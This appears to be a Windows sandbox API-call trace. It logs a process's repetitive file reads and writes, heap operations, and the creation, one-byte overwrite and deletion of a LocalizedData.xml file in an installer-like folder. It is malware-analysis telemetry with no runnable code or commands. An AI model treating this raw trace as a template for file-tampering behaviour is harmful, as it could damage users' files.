0x0 [0069.658] SetLastError (dwErrCode=0x0) [0069.658] GetLastError () returned 0x0 [0069.658] SetLastError (dwErrCode=0x0) [0069.658] GetLastError () returned 0x0 [0069.658] SetLastError (dwErrCode=0x0) [0069.658] GetLastError () returned 0x0 [0069.658] SetLastError (dwErrCode=0x0) [0069.659] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.659] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.659] GetLastError () returned 0x0 [0069.659] SetLastError (dwErrCode=0x0) [0069.659] GetLastError () returned 0x0 [0069.659] SetLastError (dwErrCode=0x0) [0069.659] GetLastError () returned 0x0 [0069.659] SetLastError (dwErrCode=0x0) [0069.659] GetLastError () returned 0x0 [0069.659] SetLastError (dwErrCode=0x0) [0069.659] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.660] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.660] GetLastError () returned 0x0 [0069.660] SetLastError (dwErrCode=0x0) [0069.660] GetLastError () returned 0x0 [0069.660] SetLastError (dwErrCode=0x0) [0069.660] GetLastError () returned 0x0 [0069.660] SetLastError (dwErrCode=0x0) [0069.660] GetLastError () returned 0x0 [0069.660] SetLastError (dwErrCode=0x0) [0069.660] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.660] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.661] GetLastError () returned 0x0 [0069.661] SetLastError (dwErrCode=0x0) [0069.661] GetLastError () returned 0x0 [0069.661] SetLastError (dwErrCode=0x0) [0069.661] GetLastError () returned 0x0 [0069.661] SetLastError (dwErrCode=0x0) [0069.661] GetLastError () returned 0x0 [0069.661] SetLastError (dwErrCode=0x0) [0069.661] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.661] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.661] GetLastError () returned 0x0 [0069.662] SetLastError (dwErrCode=0x0) [0069.662] GetLastError () returned 0x0 [0069.662] SetLastError (dwErrCode=0x0) [0069.662] GetLastError () returned 0x0 [0069.662] SetLastError (dwErrCode=0x0) [0069.662] GetLastError () returned 0x0 [0069.662] SetLastError (dwErrCode=0x0) [0069.662] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.662] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.662] GetLastError () returned 0x0 [0069.662] SetLastError (dwErrCode=0x0) [0069.662] GetLastError () returned 0x0 [0069.663] SetLastError (dwErrCode=0x0) [0069.663] GetLastError () returned 0x0 [0069.663] SetLastError (dwErrCode=0x0) [0069.663] GetLastError () returned 0x0 [0069.663] SetLastError (dwErrCode=0x0) [0069.663] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.663] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.663] GetLastError () returned 0x0 [0069.663] SetLastError (dwErrCode=0x0) [0069.663] GetLastError () returned 0x0 [0069.663] SetLastError (dwErrCode=0x0) [0069.664] GetLastError () returned 0x0 [0069.664] SetLastError (dwErrCode=0x0) [0069.664] GetLastError () returned 0x0 [0069.664] SetLastError (dwErrCode=0x0) [0069.664] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.664] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.664] GetLastError () returned 0x0 [0069.664] SetLastError (dwErrCode=0x0) [0069.664] GetLastError () returned 0x0 [0069.664] SetLastError (dwErrCode=0x0) [0069.664] GetLastError () returned 0x0 [0069.664] SetLastError (dwErrCode=0x0) [0069.665] GetLastError () returned 0x0 [0069.665] SetLastError (dwErrCode=0x0) [0069.665] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.665] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.665] GetLastError () returned 0x0 [0069.665] SetLastError (dwErrCode=0x0) [0069.665] GetLastError () returned 0x0 [0069.665] SetLastError (dwErrCode=0x0) [0069.665] GetLastError () returned 0x0 [0069.665] SetLastError (dwErrCode=0x0) [0069.665] GetLastError () returned 0x0 [0069.665] SetLastError (dwErrCode=0x0) [0069.665] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.666] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.666] GetLastError () returned 0x0 [0069.666] SetLastError (dwErrCode=0x0) [0069.666] GetLastError () returned 0x0 [0069.666] SetLastError (dwErrCode=0x0) [0069.666] GetLastError () returned 0x0 [0069.666] SetLastError (dwErrCode=0x0) [0069.666] GetLastError () returned 0x0 [0069.666] SetLastError (dwErrCode=0x0) [0069.666] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.667] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.667] GetLastError () returned 0x0 [0069.667] SetLastError (dwErrCode=0x0) [0069.667] GetLastError () returned 0x0 [0069.667] SetLastError (dwErrCode=0x0) [0069.667] GetLastError () returned 0x0 [0069.667] SetLastError (dwErrCode=0x0) [0069.667] GetLastError () returned 0x0 [0069.667] SetLastError (dwErrCode=0x0) [0069.667] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.667] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.668] GetLastError () returned 0x0 [0069.668] SetLastError (dwErrCode=0x0) [0069.668] GetLastError () returned 0x0 [0069.668] SetLastError (dwErrCode=0x0) [0069.668] GetLastError () returned 0x0 [0069.668] SetLastError (dwErrCode=0x0) [0069.668] GetLastError () returned 0x0 [0069.668] SetLastError (dwErrCode=0x0) [0069.668] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.668] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.668] GetLastError () returned 0x0 [0069.668] SetLastError (dwErrCode=0x0) [0069.669] GetLastError () returned 0x0 [0069.669] SetLastError (dwErrCode=0x0) [0069.669] GetLastError () returned 0x0 [0069.669] SetLastError (dwErrCode=0x0) [0069.669] GetLastError () returned 0x0 [0069.669] SetLastError (dwErrCode=0x0) [0069.669] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.669] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.669] GetLastError () returned 0x0 [0069.669] SetLastError (dwErrCode=0x0) [0069.669] GetLastError () returned 0x0 [0069.669] SetLastError (dwErrCode=0x0) [0069.670] GetLastError () returned 0x0 [0069.670] SetLastError (dwErrCode=0x0) [0069.670] GetLastError () returned 0x0 [0069.670] SetLastError (dwErrCode=0x0) [0069.670] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.670] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.670] GetLastError () returned 0x0 [0069.670] SetLastError (dwErrCode=0x0) [0069.670] GetLastError () returned 0x0 [0069.670] SetLastError (dwErrCode=0x0) [0069.670] GetLastError () returned 0x0 [0069.670] SetLastError (dwErrCode=0x0) [0069.671] GetLastError () returned 0x0 [0069.671] SetLastError (dwErrCode=0x0) [0069.671] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.671] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.750] GetLastError () returned 0x0 [0069.750] SetLastError (dwErrCode=0x0) [0069.751] GetLastError () returned 0x0 [0069.751] SetLastError (dwErrCode=0x0) [0069.751] GetLastError () returned 0x0 [0069.751] SetLastError (dwErrCode=0x0) [0069.751] GetLastError () returned 0x0 [0069.751] SetLastError (dwErrCode=0x0) [0069.751] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.751] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.751] GetLastError () returned 0x0 [0069.751] SetLastError (dwErrCode=0x0) [0069.751] GetLastError () returned 0x0 [0069.751] SetLastError (dwErrCode=0x0) [0069.752] GetLastError () returned 0x0 [0069.752] SetLastError (dwErrCode=0x0) [0069.752] GetLastError () returned 0x0 [0069.752] SetLastError (dwErrCode=0x0) [0069.752] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1c6, lpOverlapped=0x0) returned 1 [0069.752] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0069.752] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.752] GetLastError () returned 0x0 [0069.752] SetLastError (dwErrCode=0x0) [0069.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfd0 [0069.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0069.752] GetLastError () returned 0x0 [0069.752] SetLastError (dwErrCode=0x0) [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0069.753] WriteFile (in: hFile=0x428, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x1d0, lpOverlapped=0x0) returned 1 [0069.753] GetLastError () returned 0x0 [0069.753] SetLastError (dwErrCode=0x0) [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.753] GetLastError () returned 0x0 [0069.753] SetLastError (dwErrCode=0x0) [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0069.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0069.753] CloseHandle (hObject=0x428) returned 1 [0069.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.756] CloseHandle (hObject=0x410) returned 1 [0069.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0069.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.756] AreFileApisANSI () returned 1 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0069.756] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0069.757] GetFileType (hFile=0x410) returned 0x1 [0069.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0069.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.758] GetLastError () returned 0xb7 [0069.758] SetLastError (dwErrCode=0xb7) [0069.758] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0069.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.759] CloseHandle (hObject=0x410) returned 1 [0069.759] AreFileApisANSI () returned 1 [0069.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0069.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 45 [0069.759] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b450 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.760] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.761] FindNextFileW (in: hFindFile=0x78390, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0069.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0069.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.761] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0069.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0069.761] AreFileApisANSI () returned 1 [0069.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0069.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0069.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0069.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0069.762] AreFileApisANSI () returned 1 [0069.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.762] RtlAllocateHeap (HeapHandle=0x20000, 